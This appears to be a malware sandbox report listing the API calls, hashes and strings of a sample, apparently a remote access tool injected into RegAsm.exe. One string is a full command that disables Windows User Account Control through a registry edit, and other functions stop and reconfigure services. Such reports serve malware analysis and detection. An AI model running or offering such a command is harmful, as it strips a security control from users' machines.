                                • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                                • GetNativeSystemInfo.KERNEL32(?), ref: 00411DA5
                                • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411DC9
                                  • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                                • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E10
                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E17
                                • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F2A
                                  • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                                  • Part of subcall function 00412077: HeapFree.KERNEL32(00000000), ref: 004120EE
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                • String ID:
                                • API String ID: 3950776272-0
                                • Opcode ID: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                                • Opcode Fuzzy Hash: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: __cftoe
                                • String ID:
                                • API String ID: 4189289331-0
                                • Opcode ID: eef5811f0b3e11eaf1bdde4175ac7a9ebfa2f3cd5d18ba66a6432d1456243127
                                • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                                • Opcode Fuzzy Hash: eef5811f0b3e11eaf1bdde4175ac7a9ebfa2f3cd5d18ba66a6432d1456243127
                                • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                • String ID:
                                • API String ID: 493672254-0
                                • Opcode ID: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                                • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                                • Opcode Fuzzy Hash: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                                • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                                APIs
                                • GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                • _free.LIBCMT ref: 0044824C
                                • _free.LIBCMT ref: 00448274
                                • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                • _abort.LIBCMT ref: 00448293
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: ErrorLast$_free$_abort
                                • String ID:
                                • API String ID: 3160817290-0
                                • Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                                • Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                                • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                                • Opcode Fuzzy Hash: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                                • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                                • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                                • Opcode Fuzzy Hash: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                                • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                                • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                                • Opcode Fuzzy Hash: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                                • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: ClassCreateErrorLastRegisterWindow
                                • String ID: 0$MsgWindowClass
                                • API String ID: 2877667751-2410386613
                                • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                                • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                                APIs
                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                                • CloseHandle.KERNEL32(?), ref: 004077AA
                                • CloseHandle.KERNEL32(?), ref: 004077AF
                                Strings
                                • C:\Windows\System32\cmd.exe, xrefs: 00407796
                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: CloseHandle$CreateProcess
                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                • API String ID: 2922976086-4183131282
                                • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                                • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                                Strings
                                • SG, xrefs: 004076DA
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076C4
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                • API String ID: 0-643455097
                                • Opcode ID: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                                • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                                • Opcode Fuzzy Hash: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                                • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                                APIs
                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 0044335A
                                • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,004432EB,?,?,0044328B,?), ref: 0044336D
                                • FreeLibrary.KERNEL32(00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 00443390
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: AddressFreeHandleLibraryModuleProc
                                • String ID: CorExitProcess$mscoree.dll
                                • API String ID: 4061214504-1276376045
                                • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                                • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                                APIs
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                • CloseHandle.KERNEL32(?), ref: 00405140
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                • String ID: KeepAlive | Disabled
                                • API String ID: 2993684571-305739064
                                • Opcode ID: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                                • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                                • Opcode Fuzzy Hash: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                                • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                                APIs
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                                • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                                • Sleep.KERNEL32(00002710), ref: 0041AE07
                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: PlaySound$HandleLocalModuleSleepTime
                                • String ID: Alarm triggered
                                • API String ID: 614609389-2816303416
                                • Opcode ID: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                                • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                                • Opcode Fuzzy Hash: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                                • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                                APIs
                                • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                                • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CD6F
                                • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CD7C
                                • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CD8F
                                Strings
                                • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: Console$AttributeText$BufferHandleInfoScreen
                                • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                • API String ID: 3024135584-2418719853
                                • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                                • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                                • Opcode Fuzzy Hash: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                                APIs
                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                • _free.LIBCMT ref: 00444E06
                                • _free.LIBCMT ref: 00444E1D
                                • _free.LIBCMT ref: 00444E3C
                                • _free.LIBCMT ref: 00444E57
                                • _free.LIBCMT ref: 00444E6E
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: _free$AllocateHeap
                                • String ID:
                                • API String ID: 3033488037-0
                                • Opcode ID: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
                                • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                                • Opcode Fuzzy Hash: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
                                • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                                APIs
                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                • _free.LIBCMT ref: 004493BD
                                  • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00449589
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                • String ID:
                                • API String ID: 1286116820-0
                                • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                                • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                                APIs
                                  • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                                • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                                  • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                                  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                • String ID:
                                • API String ID: 4269425633-0
                                • Opcode ID: 050d440512ad4bd2d5c4b985fe1e5d11bc0defa287e01fcc1b5db6667af7a0db
                                • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                                • Opcode Fuzzy Hash: 050d440512ad4bd2d5c4b985fe1e5d11bc0defa287e01fcc1b5db6667af7a0db
                                • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID:
                                • API String ID: 269201875-0
                                • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                                • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01), ref: 00451179
                                • __alloca_probe_16.LIBCMT ref: 004511B1
                                • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?), ref: 00451202
                                • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?,00000002,00000000), ref: 00451214
                                • __freea.LIBCMT ref: 0045121D
                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                • String ID:
                                • API String ID: 313313983-0
                                • Opcode ID: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
                                • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                                • Opcode Fuzzy Hash: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
                                • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                                APIs
                                • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                                • _free.LIBCMT ref: 0044F3BF
                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                • String ID:
                                • API String ID: 336800556-0
                                • Opcode ID: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
                                • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                                • Opcode Fuzzy Hash: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
                                • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                                APIs
                                • GetLastError.KERNEL32(?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044829E
                                • _free.LIBCMT ref: 004482D3
                                • _free.LIBCMT ref: 004482FA
                                • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448307
                                • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448310
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$_free
                                • String ID:
                                • API String ID: 3170660625-0
                                • Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
